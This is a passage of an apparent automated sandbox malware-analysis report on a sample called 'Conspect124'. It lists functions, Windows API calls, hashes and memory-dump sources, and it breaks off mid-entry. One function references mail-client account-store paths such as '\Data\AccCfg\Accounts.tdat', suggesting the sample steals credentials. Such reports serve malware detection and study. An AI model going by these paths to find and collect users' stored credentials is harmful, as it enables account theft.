                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                      • String ID:
                                      • API String ID: 2667972263-0
                                      • Opcode ID: 49a6233bec7a959410d96ab4a6536f428a311d60b3465505635374f74429998f
                                      • Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
                                      • Opcode Fuzzy Hash: 49a6233bec7a959410d96ab4a6536f428a311d60b3465505635374f74429998f
                                      • Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98
                                      Function 23BC15DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _strlen.LIBCMT ref: 23BC1607
                                      • _strcat.LIBCMT ref: 23BC161D
                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,23BC190E,?,?,00000000,?,00000000), ref: 23BC1643
                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,23BC190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 23BC165A
                                      • lstrlenW.KERNEL32(?,?,?,?,?,23BC190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 23BC1661
                                      • lstrcatW.KERNEL32(00001008,?,?,?,?,?,23BC190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 23BC1686
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: lstrcatlstrlen$_strcat_strlen
                                      • String ID:
                                      • API String ID: 1922816806-0
                                      • Opcode ID: 5bf8e431ecf8bf5d3cf724135d177c7f8b34fcd0e393f2a5f228db36d04760b7
                                      • Instruction ID: e78b66e0ecf356a087e95f0acc0104f666a7491bedf750f2190e1309e0b3216b
                                      • Opcode Fuzzy Hash: 5bf8e431ecf8bf5d3cf724135d177c7f8b34fcd0e393f2a5f228db36d04760b7
                                      • Instruction Fuzzy Hash: CB21B636A00344AFCB25DF58DC81AEE77B8EF9C710F24487BE504AB141DF74AA4287A5
                                      Function 23BC1000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 23BC1038
                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 23BC104B
                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 23BC1061
                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 23BC1075
                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 23BC1090
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 23BC10B8
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: lstrlen$AttributesFilelstrcat
                                      • String ID:
                                      • API String ID: 3594823470-0
                                      • Opcode ID: b46421322069b88bee0d290cfb384c4aa42352f54e1a9cbab8ea3498f2bef43c
                                      • Instruction ID: 4e1bdfbe2aa529b708616512de2ba497670be9c02533cb48d65a1661ad989240
                                      • Opcode Fuzzy Hash: b46421322069b88bee0d290cfb384c4aa42352f54e1a9cbab8ea3498f2bef43c
                                      • Instruction Fuzzy Hash: 7D219F359003589FCF30EE65DC58EDB3768EF68214F104AA6E959A71A1DA309A86CB50
                                      Function 23BC3856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,23BC3518,23BC23F1,23BC1F17), ref: 23BC3864
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 23BC3872
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 23BC388B
                                      • SetLastError.KERNEL32(00000000,?,23BC3518,23BC23F1,23BC1F17), ref: 23BC38DD
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: 00ac28ad4ebc8c44f0ca7b8d4583d2f0feeebf1007ba1badaf87c6176351b501
                                      • Instruction ID: 21a3f1f8794d5b659a58f16517932545c94226ce577bbc0563ae0f64b0518e7c
                                      • Opcode Fuzzy Hash: 00ac28ad4ebc8c44f0ca7b8d4583d2f0feeebf1007ba1badaf87c6176351b501
                                      • Instruction Fuzzy Hash: 84014C36708B965DE231BF797CD4B462768FF29674B604ABAE11C964E2EF2DC800431C
                                      Function 23BC5AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,23BC6C6C), ref: 23BC5AFA
                                      • _free.LIBCMT ref: 23BC5B2D
                                      • _free.LIBCMT ref: 23BC5B55
                                      • SetLastError.KERNEL32(00000000,?,?,23BC6C6C), ref: 23BC5B62
                                      • SetLastError.KERNEL32(00000000,?,?,23BC6C6C), ref: 23BC5B6E
                                      • _abort.LIBCMT ref: 23BC5B74
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: 2c3d384e9a1c7414376a063c3894dd513afbe362a237f27f8a8bf5633d255bf9
                                      • Instruction ID: 8cf3fdc6361af2be3ec7afa272e98fe8e88f357f3fcc9a9c173b62039312a7d1
                                      • Opcode Fuzzy Hash: 2c3d384e9a1c7414376a063c3894dd513afbe362a237f27f8a8bf5633d255bf9
                                      • Instruction Fuzzy Hash: 7FF0F436204685AEC336FE3B6D04F0B2E29CFE9961F290CF7F91893191EE3485024124
                                      Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CountTick$wsprintf
                                      • String ID: ... %d%%
                                      • API String ID: 551687249-2449383134
                                      • Opcode ID: 72615b24cfb956d11cf5a86cb9c852f061a4764c0f8f0ff8739073b09940aca9
                                      • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
                                      • Opcode Fuzzy Hash: 72615b24cfb956d11cf5a86cb9c852f061a4764c0f8f0ff8739073b09940aca9
                                      • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9
                                      Function 23BC11EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 23BC1E89: lstrlenW.KERNEL32(?,?,?,?,?,23BC10DF,?,?,?,00000000), ref: 23BC1E9A
                                        • Part of subcall function 23BC1E89: lstrcatW.KERNEL32(?,?,?,23BC10DF,?,?,?,00000000), ref: 23BC1EAC
                                        • Part of subcall function 23BC1E89: lstrlenW.KERNEL32(?,?,23BC10DF,?,?,?,00000000), ref: 23BC1EB3
                                        • Part of subcall function 23BC1E89: lstrlenW.KERNEL32(?,?,23BC10DF,?,?,?,00000000), ref: 23BC1EC8
                                        • Part of subcall function 23BC1E89: lstrcatW.KERNEL32(?,23BC10DF,?,23BC10DF,?,?,?,00000000), ref: 23BC1ED3
                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 23BC122A
                                        • Part of subcall function 23BC173A: _strlen.LIBCMT ref: 23BC1855
                                        • Part of subcall function 23BC173A: _strlen.LIBCMT ref: 23BC1869
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                      • API String ID: 4036392271-1520055953
                                      • Opcode ID: 934c3392de63456b93de6b0806125f15ae6f8333450b045488fe188513c83c2e
                                      • Instruction ID: 57e0aaa1b1f0b1610b95f6c1b4209b0fb01df049f5b114373556f7c31381289f
                                      • Opcode Fuzzy Hash: 934c3392de63456b93de6b0806125f15ae6f8333450b045488fe188513c83c2e
                                      • Instruction Fuzzy Hash: 5A218279E103486EEB30DA94EC91FEE7339EF54714F0009A6F604FB191E6B15D828759
                                      Function 00404A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                      • wsprintfW.USER32 ref: 00404B16
                                      • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ItemTextlstrlenwsprintf
                                      • String ID: %u.%u%s%s$6B
                                      • API String ID: 3540041739-3884863406
                                      • Opcode ID: b14d53b64adc1f374c4cfcdb21d002b99befe6dd1747fbc8fe84211fb49063b4
                                      • Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
                                      • Opcode Fuzzy Hash: b14d53b64adc1f374c4cfcdb21d002b99befe6dd1747fbc8fe84211fb49063b4
                                      • Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
                                      Function 004064E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403318,00437800,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                      • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403318,00437800,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                      • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403318,00437800,74DF3420,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: *?|<>/":
                                      • API String ID: 589700163-165019052
                                      • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                      • Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
                                      • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                      • Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
                                      Function 23BC4B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,23BC4AEA,?,?,23BC4A8A,?,23BD2238,0000000C,23BC4BBD,00000000,00000000), ref: 23BC4B59
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 23BC4B6C
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,23BC4AEA,?,?,23BC4A8A,?,23BD2238,0000000C,23BC4BBD,00000000,00000000,?,23BC2082), ref: 23BC4B8F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: ac312524d3a6e9db12f40b31a33bd1a8f6a46ee6fc7a4bb52a97fed7d13e5590
                                      • Instruction ID: 46c9c77c7f5fae1eaf514e9c512f6fef14712df3caeb25812441781e8d4f1b9a
                                      • Opcode Fuzzy Hash: ac312524d3a6e9db12f40b31a33bd1a8f6a46ee6fc7a4bb52a97fed7d13e5590
                                      • Instruction Fuzzy Hash: 57F03C35A00248BFDB22AF94C918B9DBFB9EF18661F0045A9E909A7151DB349A41CB94
                                      Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcatW.KERNEL32(00000000,00000000,0040A5A8,00436000,?,?,00000031), ref: 004017B0
                                      • CompareFileTime.KERNEL32(-00000014,?,0040A5A8,0040A5A8,00000000,00000000,0040A5A8,00436000,?,?,00000031), ref: 004017D5
                                        • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                        • Part of subcall function 004052B0: lstrlenW.KERNEL32(004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                        • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,004226C8,00000000,?,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                        • Part of subcall function 004052B0: lstrcatW.KERNEL32(004226C8,00403233,00403233,004226C8,00000000,?,00403094), ref: 0040530B
                                        • Part of subcall function 004052B0: SetWindowTextW.USER32(004226C8,004226C8), ref: 0040531D
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                        • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                      • String ID:
                                      • API String ID: 1941528284-0
                                      • Opcode ID: 47ce6a9d9fbc71e10f5336432a93a05ba538ef86279b97ebc953335fde788606
                                      • Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
                                      • Opcode Fuzzy Hash: 47ce6a9d9fbc71e10f5336432a93a05ba538ef86279b97ebc953335fde788606
                                      • Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D
                                      Function 23BC7153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 23BC715C
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 23BC717F
                                        • Part of subcall function 23BC56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 23BC5702
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 23BC71A5
                                      • _free.LIBCMT ref: 23BC71B8
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 23BC71C7
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: 0a87c4870ffbda1b5981cda68abed19d00da17e0d3eec8e20f39ecfe02b04638
                                      • Instruction ID: 6ab2b916776c81120f42d999d0a906038c53a1ff7c3c45916c3076d53dbee51b
                                      • Opcode Fuzzy Hash: 0a87c4870ffbda1b5981cda68abed19d00da17e0d3eec8e20f39ecfe02b04638
                                      • Instruction Fuzzy Hash: 1001AC767012957F6331AEBB4C4DD7B6A6DDED6D6071409BEFD04C7600DE648C0181B4
                                      Function 23BC5B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000000,23BC636D,23BC5713,00000000,?,23BC2249,?,?,23BC1D66,00000000,?,?,00000000), ref: 23BC5B7F
                                      • _free.LIBCMT ref: 23BC5BB4
                                      • _free.LIBCMT ref: 23BC5BDB
                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC5BE8
                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23BC5BF1
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 76ddc24d43d3e4e3221b31dcb0d0a773fb674b62fb7aa706ebe2a3de0daeb4f8
                                      • Instruction ID: a7889332c8c107b86c96f8fb6bcddd7b46db47e2bcc84bb3242d2019c83ac509
                                      • Opcode Fuzzy Hash: 76ddc24d43d3e4e3221b31dcb0d0a773fb674b62fb7aa706ebe2a3de0daeb4f8
                                      • Instruction Fuzzy Hash: 5D01AD3A204782AEC232FE3A1D84E0B2E6DDFE9570B1509FBF81993152EE6889024164
                                      Function 00401DB3 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(?), ref: 00401DB6
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                      • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                      • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4155949371.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.4155927837.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155977051.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4155997104.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000045C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.000000000046F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000007.00000002.4156025065.00000000004A3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                      • String ID:
                                      • API String ID: 3808545654-0
                                      • Opcode ID: bc375dde46825d3f1d903fa7ab5296d8f4650d21e22a6159151442d341355b9e
                                      • Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
                                      • Opcode Fuzzy Hash: bc375dde46825d3f1d903fa7ab5296d8f4650d21e22a6159151442d341355b9e
                                      • Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
                                      Function 23BC1E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,?,?,23BC10DF,?,?,?,00000000), ref: 23BC1E9A
                                      • lstrcatW.KERNEL32(?,?,?,23BC10DF,?,?,?,00000000), ref: 23BC1EAC
                                      • lstrlenW.KERNEL32(?,?,23BC10DF,?,?,?,00000000), ref: 23BC1EB3
                                      • lstrlenW.KERNEL32(?,?,23BC10DF,?,?,?,00000000), ref: 23BC1EC8
                                      • lstrcatW.KERNEL32(?,23BC10DF,?,23BC10DF,?,?,?,00000000), ref: 23BC1ED3
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: lstrlen$lstrcat
                                      • String ID:
                                      • API String ID: 493641738-0
                                      • Opcode ID: 7439acb54f4d9d5e67dab8598c6236961099588f3567080407b4e11de4c8f56b
                                      • Instruction ID: 42ea2cf3d9d85daf408ccdce36c4f92acd1f152452626494257ee85709837737
                                      • Opcode Fuzzy Hash: 7439acb54f4d9d5e67dab8598c6236961099588f3567080407b4e11de4c8f56b
                                      • Instruction Fuzzy Hash: 14F0E9261002147ED7317B19AC95E7F777CEFDAA20F04081EF60C931909B54684282B5
                                      Function 23BC91B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 23BC91D0
                                        • Part of subcall function 23BC571E: HeapFree.KERNEL32(00000000,00000000,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?), ref: 23BC5734
                                        • Part of subcall function 23BC571E: GetLastError.KERNEL32(?,?,23BC924F,?,00000000,?,00000000,?,23BC9276,?,00000007,?,?,23BC7E5A,?,?), ref: 23BC5746
                                      • _free.LIBCMT ref: 23BC91E2
                                      • _free.LIBCMT ref: 23BC91F4
                                      • _free.LIBCMT ref: 23BC9206
                                      • _free.LIBCMT ref: 23BC9218
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.4177404484.0000000023BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 23BC0000, based on PE: true
                                      • Associated: 00000007.00000002.4177383917.0000000023BC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                      • Associated: 00000007.00000002.4177404484.0000000023BD6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_23bc0000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 78e420097c5488cdc91c44fa4e6d8a04a99bf2440cd06a940f9f3fbbf5471ee1
                                      • Instruction ID: faac9a2125dd0c0d43d35f154f66b7d2135ec449e8c8ce8eeb24ab861aae304e
                                      • Opcode Fuzzy Hash: 78e420097c5488cdc91c44fa4e6d8a04a99bf2440cd06a940f9f3fbbf5471ee1
                                      • Instruction Fuzzy Hash: 0CF04F716146C4AFD630EF59D6C5D067BF9EF286107540CA6E94DDB901CA34F8908A54
                                      Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,?), ref: 00401D5D
                                      • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                      • DeleteObject.GDI32(00000000), ref: 00401DA8
                                      Memory Dump Source
